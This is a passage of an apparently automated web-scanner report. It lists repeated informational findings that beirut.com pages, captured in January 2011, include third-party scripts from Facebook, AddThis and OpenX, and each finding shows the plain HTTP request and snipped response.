http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://www.jscache.com/wejs?wtype=selfserveprop&uniq=478&locationId=1224403&lang=en_US&rating=true&nreviews=5&writereviewlink=true&popIdx=true&iswide=false&linkt=1

Request

GET /Nightlife/Karantina/The-Library/113 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</div>
<script src="http://www.jscache.com/wejs?wtype=selfserveprop&uniq=478&locationId=1224403&lang=en_US&rating=true&nreviews=5&writereviewlink=true&popIdx=true&iswide=false&linkt=1"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.594. http://www.beirut.com/Nightlife/Karaoke-Lounges/8094927980 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Karaoke-Lounges/8094927980

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Karaoke-Lounges/8094927980 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:36:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.595. http://www.beirut.com/Nightlife/Lounges/9663063907 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Lounges/9663063907

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Lounges/9663063907 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:33:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.596. http://www.beirut.com/Nightlife/Nightclubs/311071488 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Nightclubs/311071488

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Nightclubs/311071488 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:33:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.597. http://www.beirut.com/Nightlife/Pubs/242334555 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Pubs/242334555

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Pubs/242334555 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:26:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.598. http://www.beirut.com/Nightlife/Super-Nightclub/131874060 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Super-Nightclub/131874060

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Super-Nightclub/131874060 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:37:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.599. http://www.beirut.com/Online-Internet/Blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Blogs

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Blogs HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:50:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.600. http://www.beirut.com/Online-Internet/Business/56859781 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Business/56859781

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Business/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:51:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.601. http://www.beirut.com/Online-Internet/Classifieds/395527905 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Classifieds/395527905

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Classifieds/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:14:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.602. http://www.beirut.com/Online-Internet/Design-services/3885810200 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Design-services/3885810200

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Design-services/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:17:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.603. http://www.beirut.com/Online-Internet/Directories/0054751592 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Directories/0054751592

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Directories/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:18:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.604. http://www.beirut.com/Online-Internet/Fashion-and-Shopping/8023704728 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Fashion-and-Shopping/8023704728

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Fashion-and-Shopping/8023704728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:20:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.605. http://www.beirut.com/Online-Internet/Foreign-Exchange/5783938930 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Foreign-Exchange/5783938930

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Online-Internet/Foreign-Exchange/5783938930 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
